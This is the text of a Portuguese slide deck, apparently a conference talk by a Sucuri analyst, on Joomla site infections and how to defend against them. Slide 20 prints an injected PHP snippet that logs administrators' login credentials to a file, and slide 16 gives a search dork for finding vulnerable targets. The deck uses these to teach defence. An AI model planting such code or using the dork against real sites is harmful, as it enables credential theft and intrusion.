Slide 1

Slide 1 text

Análise de Infecções em Joomla Bruno Borges, CEH, Security Analyst @ Sucuri.net #JDBR14 @brunoborgessec

Slide 2

Slide 2 text

No content

Slide 3

Slide 3 text

O Joomla costuma ser hackeado? #JDBR14 :: @brunoborgessec

Slide 4

Slide 4 text

SIM ! Má notícia: #JDBR14 :: @brunoborgessec

Slide 5

Slide 5 text

A maior parte das infecções são em Joomla 1.5.x Boa notícia: Ufa! Afinal de contas, todos usamos a versão 3.2, 3.3 … Será? o.O #JDBR14 :: @brunoborgessec (Não quer dizer que 2.x e 3.x sejam amplamente seguras)

Slide 6

Slide 6 text

Se você usa Joomla 1.5.x puro: •  Você já foi hackeado •  Você será hackeado •  Você está sendo hackeado #JDBR14 :: @brunoborgessec

Slide 7

Slide 7 text

Histórico de Releases do Joomla #JDBR14 :: @brunoborgessec

Slide 8

Slide 8 text

Histórico de Releases do Joomla #JDBR14 :: @brunoborgessec

Slide 9

Slide 9 text

Histórico de Releases do Joomla #JDBR14 :: @brunoborgessec

Slide 10

Slide 10 text

Histórico de Releases do Joomla #JDBR14 :: @brunoborgessec

Slide 11

Slide 11 text

Tipos de Vulnerabilidades #JDBR14 :: @brunoborgessec Fonte: http://www.cvedetails.com/vendor/3496/Joomla.html

Slide 12

Slide 12 text

Vulnerabilidades através dos anos #JDBR14 :: @brunoborgessec Fonte: http://www.cvedetails.com/vendor/3496/Joomla.html

Slide 13

Slide 13 text

Ataques ao Joomla #JDBR14 :: @brunoborgessec

Slide 14

Slide 14 text

Vetores de Ataque #JDBR14 :: @brunoborgessec

Slide 15

Slide 15 text

Processo dos ataques atuais 1) Encontrar vulnerabilidade: seclists.org/fulldisclosure exploit-db.com cve.mitre.org web.nvd.nist.gov

Slide 16

Slide 16 text

Processo dos ataques atuais 2) Encontrar alvo Google Dork: inurl:index.php?option=com_collector shodanhq.com #JDBR14 :: @brunoborgessec

Slide 17

Slide 17 text

Processo dos ataques atuais 3) Ataque! #JDBR14 :: @brunoborgessec

Slide 18

Slide 18 text

Ameaças / Vulnerabilidades Recentes #JDBR14 :: @brunoborgessec

Slide 19

Slide 19 text

Ameaças / Vulnerabilidades Recentes Qualquer versão < 3.1.0.4 RCE -> Remote Code Execution: Vulnerabilidade que pode permitir a um invasor executar código arbitrário e assumir o controle do sistema afetado Joomla JomSocial: Remote Code Execution #JDBR14 :: @brunoborgessec Fonte: http://blog.sucuri.net/2014/02/joomla-jomsocial-remote-code-execution-vulnerability.html

Slide 20

Slide 20 text

Ameaças / Vulnerabilidades Recentes Joomla Password Stealer Arquivo infectado: /administrator/components/com_login/models/login.php $fh = fopen("components/com_login/models/login.txt", 'a'); date_default_timezone_set("America/Chicago"); fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR] [$credentials[username]:$credentials[password]]\n"); fclose($fh); #JDBR14 :: @brunoborgessec http://labs.sucuri.net/?note=2013-11-21

Slide 21

Slide 21 text

Ameaças / Vulnerabilidades Recentes Backdoor de todos os dias #JDBR14 :: @brunoborgessec

Slide 22

Slide 22 text

Ameaças / Vulnerabilidades Recentes JPG EXIF Headers #JDBR14 :: @brunoborgessec http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

Slide 23

Slide 23 text

Ameaças / Vulnerabilidades Recentes JPG EXIF Headers #JDBR14 :: @brunoborgessec http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

Slide 24

Slide 24 text

Ameaças / Vulnerabilidades Recentes JCE Remote File Upload 197.205.70.37 - - [23/Jan/2014:16:46:54 -0500] "POST /index.php? option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c124 6b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.0" 200 302 "-" "BOT/0.1 (BOT for JCE)" 197.205.70.37 - - [23/Jan/2014:16:46:55 -0500] "POST /index.php? option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 200 329 "-" "BOT/0.1 (BOT for JCE)” http://blog.sucuri.net/2014/03/jce-joomla-extension-attacks-in-the-wild.html

Slide 25

Slide 25 text

Proteções #JDBR14 :: @brunoborgessec

Slide 26

Slide 26 text

Proteções Bloquear PHP onde não deve ter deny from all Ex: /images/stories #JDBR14 :: @brunoborgessec

Slide 27

Slide 27 text

Proteções Patching x Virtual Patching Patching: Atualizar para corrigir vulnerabilidades existentes. Virtual Patching: Soluções de produtos que permitem a proteção de vulnerabilidades existentes quando não for possível aplicar o patch. Ex: Joomla 1.5.x #JDBR14 :: @brunoborgessec

Slide 28

Slide 28 text

Proteções Web Application Firewall / Website Firewall •  A forma mais rápida de proteger o seu site. •  Requer pouco esforço. •  Necessário pouco conhecimento de Segurança #JDBR14 :: @brunoborgessec

Slide 29

Slide 29 text

Proteções Verifique se seu site está limpo: sitecheck.sucuri.net #JDBR14 :: @brunoborgessec

Slide 30

Slide 30 text

Considerações Finais #JDBR14 :: @brunoborgessec

Slide 31

Slide 31 text

Considerações Finais #JDBR14 :: @brunoborgessec

Slide 32

Slide 32 text

Considerações Finais #JDBR14 :: @brunoborgessec

Slide 33

Slide 33 text

Considerações Finais #JDBR14 :: @brunoborgessec

Slide 34

Slide 34 text

Considerações Finais #JDBR14 :: @brunoborgessec

Slide 35

Slide 35 text

Considerações Finais #JDBR14 :: @brunoborgessec

Slide 36

Slide 36 text

Considerações Finais #JDBR14 :: @brunoborgessec

Slide 37

Slide 37 text

Dúvidas #JDBR14 :: @brunoborgessec

Slide 38

Slide 38 text

OBRIGADO! @brunoborgessec /in/brunoaborges [email protected] bbsec.net / sucuri.net #JDBR14 :: @brunoborgessec